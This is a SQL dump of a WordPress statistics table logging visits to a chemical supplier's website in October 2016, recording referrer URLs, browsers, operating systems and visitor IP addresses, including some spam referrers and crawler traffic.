INSERT INTO `wp_statistics_visitor` VALUES (9, '2016-10-04', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '68.72.228.37', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10, '2016-10-04', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '96.91.254.169', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11, '2016-10-04', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '47.0', '', '96.91.254.169', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12, '2016-10-04', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '150.70.173.45', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13, '2016-10-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '91.121.141.219', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14, '2016-10-04', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '173.165.95.65', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15, '2016-10-04', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.0.7', '', '158.85.11.189', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (16, '2016-10-04', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '98.23.125.158', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (17, '2016-10-04', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '174.199.25.248', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (18, '2016-10-04', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '15.0.1', '', '31.193.51.105', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (19, '2016-10-04', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '50.62.177.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (20, '2016-10-04', 'https://www.google.com/', 'Edge', 'Windows', '13.10586', '', '69.117.144.53', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (21, '2016-10-04', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '173.199.128.215', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (22, '2016-10-04', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjhtbu4-cHPAhUBZIYKHUC4AcUYABAA&ei=qwv0V5P8Dou8eb-Sg_AD&sig=AOD64_2A7J3tj0r0E2ZWXR-y45oNr1YiFA&rct=j&q=&sqi=2&ved=0ahUKEwjT_ba4-cHPAhULXh4KHT_JAD4Q0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '141.189.251.1', '000', 24, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (23, '2016-10-04', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.5', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (24, '2016-10-04', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '210.195.0.34', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (25, '2016-10-04', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '66.73.8.133', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (26, '2016-10-04', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '50.0.2661.89', '', '70.212.38.144', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (27, '2016-10-04', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '70.91.176.2', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (28, '2016-10-04', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '108.183.28.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (29, '2016-10-04', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '74.208.152.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (30, '2016-10-04', 'https://www.google.com/url?url=https://www.miller-stephenson.com/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwiy4Men_MHPAhVLeD4KHXmuCwcQFggVMAA&usg=AFQjCNHVMV3tSuqMIrrBe8ycLmdO3Xacdw', 'MSIE', 'Windows', '7.0', '', '75.144.101.97', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (31, '2016-10-04', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '47.138.212.52', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (32, '2016-10-04', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '178.211.40.227', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (33, '2016-10-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '174.47.212.222', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (34, '2016-10-04', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '184.181.126.28', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (35, '2016-10-04', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '9.50', '', '31.148.246.165', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (36, '2016-10-04', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '5.0', '', '31.132.79.43', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (37, '2016-10-04', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '109.199.99.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (38, '2016-10-04', 'https://www.miller-stephenson.com', 'Chrome', 'Chrome OS', '53.0.2785.103', '', '10.124.1.147', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (39, '2016-10-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.190', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (40, '2016-10-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.15', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (41, '2016-10-04', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '184.168.192.31', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (42, '2016-10-04', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '64.184.0.98', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (43, '2016-10-04', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '98.142.27.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (44, '2016-10-04', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjg5oSQg8LPAhWI8CYKHTA2De0QFghFMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'Firefox', 'Windows', '29.0', '', '64.184.0.98', '000', 27, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (45, '2016-10-04', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '150.70.173.44', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (46, '2016-10-04', 'https://www.bing.com/search?q=Miller-Stephenson+Epoxy+907.&src=IE-TopResult&FORM=IETR02&conversationid=&adlt=strict', 'MSIE', 'Windows', '11.0', '', '170.225.31.132', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (47, '2016-10-04', 'https://www.miller-stephenson.com', 'python-requests', 'Unknown', '2.7.0', '', '127.0.0.1', '000', 51, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (48, '2016-10-04', 'https://www.miller-stephenson.com', 'Safari', 'Linux', '534.34', '', '127.0.0.1', '000', 52, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (49, '2016-10-04', 'https://www.c-english.ru/', 'MSIE', 'Windows', '6.0', '', '178.137.84.86', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (50, '2016-10-04', 'https://www.miller-stephenson.com/miller/support.html', 'Chrome', 'Windows', '53.0.2785.143', '', '192.168.10.68', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (51, '2016-10-04', 'https://www.adsensecustomsearchads.com/afs/ads?q=west%20epoxy%20resin&adpage=2&ccfn=amazon_numbered&r=m&fexp=21404&client=amazon&channel=g-channel-92%2Bg-channel-137%2Bg-channel-276%2Bg-channel-334&hl=en&adtest=off&type=0&oe=UTF-8&ie=UTF-8&format=n6&ad=n6&nocache=6901475615909313&num=0&output=uds_ads_only&v=3&bsl=10&u_his=8&u_tz=-420&dt=1475615909314&u_w=1670&u_h=939&biw=-12245933&bih=-12245933&isw=1425&ish=1&psw=1425&psh=0&frm=2&uio=uv3-&jsv=91621&rurl=httpss%3A%2F%2Fd14qd3he45186l.cloudfront.net%2Fads-search32.html&referer=www.amazon.com', 'Edge', 'Windows', '14.14393', '', '172.251.166.88', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (52, '2016-10-04', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '65.208.151.117', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (53, '2016-10-04', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '34.0.1847.137', '', '104.200.151.76', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (54, '2016-10-04', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '107.77.87.33', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (55, '2016-10-04', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '6.0', '', '65.208.151.113', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (56, '2016-10-04', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '6.0', '', '65.208.151.119', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (57, '2016-10-04', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '6.0', '', '65.208.151.112', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (58, '2016-10-04', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '6.0', '', '65.208.151.114', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (59, '2016-10-04', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.113', '', '146.197.246.83', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (60, '2016-10-04', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '6.0', '', '65.208.151.118', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (61, '2016-10-04', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '52.0.2743.116', '', '72.104.136.51', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (62, '2016-10-04', 'https://www.miller-stephenson.com/wp-content/themes/flatsome/inc/extensions/flatsome-live-search/\\\\\\\'+suggestion.img+\\\\\\\'', 'MSIE', 'Windows', '6.0', '', '65.208.151.115', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (63, '2016-10-04', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '64.184.0.98', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (64, '2016-10-04', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.176.202.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (65, '2016-10-04', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '15.0.1', '', '184.173.144.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (66, '2016-10-04', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '47.0', '', '197.251.167.118', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (67, '2016-10-04', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '173.251.75.178', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (68, '2016-10-04', 'https://www.miller-stephenson.com/miller/adhesive_kits.html', 'MSIE', 'Windows', '9.0', '', '182.118.20.232', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (69, '2016-10-04', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '158.116.144.17', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (70, '2016-10-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '184.71.51.238', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (71, '2016-10-04', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '47.146.56.37', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (72, '2016-10-04', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '126.245.15.237', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (73, '2016-10-04', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '6.0', '', '65.208.151.116', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (74, '2016-10-04', 'https://www.miller-stephenson.com', 'Safari', 'Unknown', '602.1', '', '126.245.15.237', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (75, '2016-10-04', 'https://www.miller-stephenson.com/miller/support.html', 'AppleWebKit', 'Windows', '534', '', '131.253.25.173', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (76, '2016-10-04', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '74.7.225.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (77, '2016-10-04', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (78, '2016-10-04', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '194.187.170.106', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (79, '2016-10-04', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '223.11.54.226', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (80, '2016-10-04', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '51.0.2704.81', '', '66.87.127.114', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (81, '2016-10-04', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '120.76.132.64', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (82, '2016-10-04', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '131.253.24.159', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (83, '2016-10-04', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '65.55.212.92', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (84, '2016-10-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.199', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (85, '2016-10-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.92', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (86, '2016-10-04', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiUpsK0nMLPAhWDPCYKHUSlDHAQFggdMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=l45zfKkss4JmNIArtuSsoQ&bvm=bv.134495766,d.eWE', 'MSIE', 'Windows', '11.0', '', '192.107.246.82', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (87, '2016-10-04', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '12.246', '', '131.253.38.67', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (88, '2016-10-04', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.198.101.134', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (89, '2016-10-04', 'https://www.bing.com/', 'Edge', 'Windows', '14.14393', '', '74.193.126.144', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (90, '2016-10-04', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '174.127.133.99', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (91, '2016-10-04', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '174.127.133.98', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (92, '2016-10-04', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '174.127.133.106', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (93, '2016-10-04', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '174.127.133.100', '000', 52, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (94, '2016-10-04', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '174.127.133.102', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (95, '2016-10-04', 'https://www.google.co.uk/url?sa=t&source=web&cd=1', 'Chrome', 'Linux', '46.0.2490.80', '', '104.236.83.234', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (96, '2016-10-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.116', '', '107.3.95.149', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (97, '2016-10-04', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.198', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (98, '2016-10-04', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '70.176.168.45', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (99, '2016-10-04', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&ved=0ahUKEwjDn4Odo8LPAhUE5mMKHXc0CEg4ChAWCGEwBA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fshieldsys-rfi-nickel-conductive-coating%2F&usg=AFQjCNFhByIuYyeFwKX6DehFSg5ZZXqcSQ', 'MSIE', 'Windows', '11.0', '', '173.11.16.86', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (100, '2016-10-04', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '65.200.13.34', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (101, '2016-10-04', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '174.127.133.104', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (102, '2016-10-04', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '174.127.133.105', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (103, '2016-10-04', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '174.127.133.101', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (104, '2016-10-04', 'https://lnkd.in', 'AppleWebKit', 'iPhone', '602.1.50', '', '50.187.83.54', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (105, '2016-10-04', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '125.209.235.183', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (106, '2016-10-04', 'https://www.miller-stephenson.com/', 'AppleWebKit', 'iPhone', '601.1.46', '', '125.209.235.182', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (107, '2016-10-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '52.0.2743.116', '', '125.209.235.184', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (108, '2016-10-04', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.149.92.147', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (109, '2016-10-04', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '68.47.243.9', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (110, '2016-10-04', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwii4o7GqsLPAhVB_WMKHZOqBi4QFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.134495766,d.cGc', 'MSIE', 'Windows', '11.0', '', '130.76.24.29', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (111, '2016-10-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.116', '', '72.210.38.27', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (112, '2016-10-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '173.89.100.216', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (113, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/medical-chemicals/', 'MSIE', 'Windows', '6.0', '', '65.208.151.118', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (114, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/medical-chemicals/', 'MSIE', 'Windows', '6.0', '', '65.208.151.117', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (115, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/medical-chemicals/', 'MSIE', 'Windows', '6.0', '', '65.208.151.112', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (116, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/medical-chemicals/', 'MSIE', 'Windows', '6.0', '', '65.208.151.113', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (117, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/medical-chemicals/', 'MSIE', 'Windows', '6.0', '', '65.208.151.119', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (118, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/medical-chemicals/', 'MSIE', 'Windows', '6.0', '', '65.208.151.116', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (119, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '14.36.156.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (120, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/medical-chemicals/', 'MSIE', 'Windows', '6.0', '', '65.208.151.114', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (121, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/medical-chemicals/', 'MSIE', 'Windows', '6.0', '', '65.208.151.115', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (122, '2016-10-05', 'https://www.google.ca/', 'Chrome', 'Android', '53.0.2785.124', '', '67.193.129.67', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (123, '2016-10-05', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '108.174.149.222', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (124, '2016-10-05', 'https://r.search.yahoo.com/_ylt=A0SO8zGSS_RX8akA6Lhx.9w4;_ylu=X3oDMTByM3V1YTVuBGNvbG8DZ3ExBHBvcwMzBHZ0aWQDBHNlYwNzcg--/RV=2/RE=1475656723/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fproduct%2fepon-1001-x-75%2f/RK=0/RS=jollBcS4EeREh7CQr1nfo3ihUCE-', 'Safari', 'iPhone', '10.0', '', '172.10.113.174', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (125, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.124', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (126, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.143', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (127, '2016-10-05', 'https://www.google.com.au/', 'Chrome', 'Windows', '50.0.2661.102', '', '203.41.172.10', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (128, '2016-10-05', 'https://www.mosrif.ru/', 'MSIE', 'Windows', '6.0', '', '134.249.65.218', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (129, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '203.75.213.67', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (130, '2016-10-05', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '81.169.144.135', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (131, '2016-10-05', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '184.21.189.78', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (132, '2016-10-05', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '46.21.172.147', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (133, '2016-10-05', 'https://www.google.com/afs/ads?q=quick%20freeze&oe=utf-8&ie=utf-8&lo=false&adpage=1&adrep=4&r=m&fexp=21404&client=aj-about-sem&channel=29594%2Cdc_us%2Cud_desktop&adtest=off&adsafe=medium&type=0&format=p4%7Cn5&ad=n5p4&nocache=8721475628844025&num=0&output=uds_ads_only&v=3&adlh=on&adext=as1%2Csr1&bsl=10&u_his=1&u_tz=-240&dt=1475628844035&u_w=1366&u_h=768&biw=1354&bih=651&psw=1354&psh=1080&frm=0&uio=uv3cs1sr1lo0va1hCsl1cc0-lHst16sd13sv13sa13lt18ld16lv16da1-lhst16sd13sv13sa13lt18ld16lv16da1&jsv=91621&rurl=https%3A%2F%2Findex.about.com%2Findex%3Fqsrc%3D999%26qo%3DsemQuery%26ad%3DsemD%26o%3D29594%26l%3Dsem%26askid%3D9d8bad00-4de2-4385-a7b0-08d834a68c32-0-ab_msb%26q%3Dquick%2520freeze%26dqi%3DBest%2520Way%2520to%2520Freeze%2520Strawberries%26am%3Dbroad%26an%3Dmsn_s&referer=https%3A%2F%2Fwww.searchnow.com%2F%3Fsbq%3DBest%2BWay%2Bto%2BFreeze%2BStrawberries%26q%3DBest%2BWay%2Bto%2BFreeze%2BStrawberries%26ssq%3D1%26pid%3D630205750139912246%26dev%3Dc%26dev%3Dc%26pid%3D630205750139912246%26ssq%3D1%26gclid%3DCKGagMC5ws8CFdgIgQodTSQBGA%26quid%3D11564060%26caid%3Dsh0040%26tsk%3DyiTmlUSvuKmP66tqwMqPPAcsWIRFbstKfGPKJ5y_XDQGwqWdBz9Fk91_FPCpfj0HUtqARR6RN1LdYZw_TBet4MybeuyUZ1myszgA6fQXPA3hKNKsq0WlBqZ-ub07QrluETZHrCGzUIsA3q1Qb-mDHAg7loTuycv5VM1EHxX93LM%252C%26oq%3Dfreezing%2520strawberries%26qq%3DFreezing%2520Strawberries%2520in%2520Freezer%2520Bags%26vi%3Drc%26rcp%3D1%26rcs%3Dbody', 'Edge', 'Windows', '14.14393', '', '45.37.48.188', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (134, '2016-10-05', 'https://cheap-pills-norx.com/', 'MSIE', 'Windows', '6.0', '', '37.115.187.217', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (135, '2016-10-05', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '27.124.126.2', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (136, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '91.121.77.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (137, '2016-10-05', 'https://server-d/almacen/douglas/request_list.php', 'MSIE', 'Windows', '11.0', '', '174.30.151.58', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (138, '2016-10-05', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '50.63.8.35', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (139, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '97.82.242.0', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (140, '2016-10-05', 'https://www.google.com.br/', 'Chrome', 'Windows', '53.0.2785.143', '', '179.181.81.116', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (141, '2016-10-05', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '128.234.42.72', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (142, '2016-10-05', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 119, 0); 
